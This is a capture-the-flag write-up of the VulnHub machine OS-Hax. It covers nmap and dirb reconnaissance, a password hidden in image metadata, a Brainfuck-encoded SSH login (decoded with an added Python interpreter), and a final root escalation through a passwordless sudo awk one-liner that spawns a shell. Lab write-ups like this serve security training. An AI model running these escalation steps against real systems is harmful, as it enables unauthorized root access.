[VULNHUB] OS-Hax
For Indonesian version of this write-up, click here.
Setup
Add the machine's IP address with the localhost hostname in /etc/hosts, and don't forget to comment out the other loopback entries that use the localhost hostname.
#127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
#::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
<Machine_IP> localhost
Information Gathering
nmap
The first thing to do is gather some information using nmap.
nmap -sV -sC -p- localhost -oN initial.nmap -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 43:0e:61:74:5a:cc:e1:6b:72:39:b2:93:4e:e3:d0:81 (RSA)
| 256 43:97:64:12:1d:eb:f1:e9:8c:d1:41:6d:ed:a4:5e:9c (ECDSA)
|_ 256 e6:3a:13:8a:77:84:be:08:57:d2:36:8a:18:c9:09:d6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5ECF6AFD7D00CCBE6B3C7AA8FD31BDE8
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
MAC Address: 08:00:27:E2:E3:E2 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Apart from SSH, the only service the server runs is HTTP on port 80.
dirb
Since we know that the server is running an HTTP service, we can use dirb or gobuster to scan the server's directories.
dirb http://localhost /usr/share/wordlists/dirb/common.txt
---- Scanning URL: http://localhost/ ----
==> DIRECTORY: http://localhost/css/
==> DIRECTORY: http://localhost/html/
==> DIRECTORY: http://localhost/img/
+ http://localhost/index.html (CODE:200|SIZE:3135)
==> DIRECTORY: http://localhost/js/
+ http://localhost/server-status (CODE:403|SIZE:274)
==> DIRECTORY: http://localhost/wordpress/
From the scan result, we know that the server is also running WordPress as its CMS. We can then use wpscan to scan for vulnerabilities that may exist on the server.
wpscan
wpscan --url http://localhost/wordpress/
But there is nothing interesting in the scan result. The server runs the newest version of WordPress, a built-in theme, and no plugins at all.
Next, I tried to open the other directories listed by dirb, which are /css, /html, and /img.
And I found something interesting in /img: the file flaghost.png.
ExifTool
ExifTool is a free and open-source software program for reading, writing, and manipulating image, audio, video, and PDF metadata.
We can use exiftool to examine the metadata of flaghost.png.
Metadata is “data that provides information about other data”. In other words, it is “data about data”. (wikipedia.org)
Pixels Per Unit X : 3780
Pixels Per Unit Y : 3780
Pixel Units : meters
Make : passw@45
Image Size : 387x98
Megapixels : 0.038
It turns out that there is a passw@45 string in the metadata.
Then open http://localhost/passw@45 and we get another clue, flag2.txt.
flag2.txt contains a Brainfuck program.
+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
>--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
+++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<
Brainfuck is an esoteric programming language created in 1993 by Urban Müller, and is notable for its extreme minimalism. The language consists of only eight simple commands and an instruction pointer.
Next, we can use a Brainfuck interpreter such as copy.sh to run the program and read its output.
web:Hacker@4514
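To decode the program locally instead of pasting it into an online tool, here is a small Brainfuck interpreter written for this write-up (an added example, not code from the original post); it runs the program quoted from flag2.txt above and returns the same string.

```python
def run_brainfuck(program: str, max_steps: int = 1_000_000) -> str:
    """Execute a Brainfuck program and return everything it prints.
    Cells are unsigned bytes (wrap at 256) on a tape that grows rightwards; any
    character outside the eight commands is ignored, so the spaces in the quoted
    program need no cleanup. max_steps bounds a program that never halts."""
    code = [c for c in program if c in "<>+-.,[]"]
    jump, stack = {}, []  # matching bracket positions, so each jump is O(1)
    for pos, cmd in enumerate(code):
        if cmd == "[":
            stack.append(pos)
        elif cmd == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at instruction {pos}")
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at instruction {stack[-1]}")
    tape, ptr, pc, out = [0], 0, 0, []
    for _ in range(max_steps):
        if pc >= len(code):
            return "".join(out)
        cmd = code[pc]
        if cmd == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif cmd == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved left of cell 0")
            ptr -= 1
        elif cmd == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif cmd == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif cmd == ".":
            out.append(chr(tape[ptr]))
        elif cmd == ",":
            pass  # no input stream here: ',' reads EOF and leaves the cell as is
        elif (cmd == "[" and tape[ptr] == 0) or (cmd == "]" and tape[ptr] != 0):
            pc = jump[pc]  # skip the loop body / go back to its start
        pc += 1
    raise RuntimeError("step limit exceeded; program may not halt")

# The program quoted from flag2.txt in the write-up (spaces are ignored).
FLAG2_PROGRAM = """+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
>--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
+++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<"""
```

Calling run_brainfuck(FLAG2_PROGRAM) returns web:Hacker@4514, the same string the online interpreter produced.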
Exploitation
User Flag
Log in with ssh using the credentials we got before, and we get the user flag.
web@jax:~$ id
uid=1001(web) gid=1000(uname-a) groups=1000(uname-a)
web@jax:~$ ls
flag3.txt
web@jax:~$ cat flag3.txt
______ ______ ____ __
/ ____/____ /_ __/____ / __ \ ____ ____ / /_
/ / __ / __ \ / / / __ \ / /_/ // __ \ / __ \ / __/
/ /_/ // /_/ / / / / /_/ / / _, _// /_/ // /_/ // /_
\____/ \____/ /_/ \____/ /_/ |_| \____/ \____/ \__/
MD5-HASH : 40740735d446c27cd551f890030f7c75
Then run system enumeration using LinEnum from the /tmp directory.
[+] We can sudo without supplying a password!
Matching Defaults entries for web on jax:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User web may run the following commands on jax:
(root) NOPASSWD: /usr/bin/awk
[+] Possible sudo pwnage!
/usr/bin/awk
From the enumeration result above we know that the user web can run the awk command with sudo without providing a password.
This can be confirmed by opening /etc/sudoers to see the user privilege specification for the web user.
web ALL= (root) NOPASSWD: /usr/bin/awk
Then we can use GTFOBins to look up how awk can be abused to gain privilege escalation.
sudo awk 'BEGIN {system("/bin/sh")}'
and we gain root access.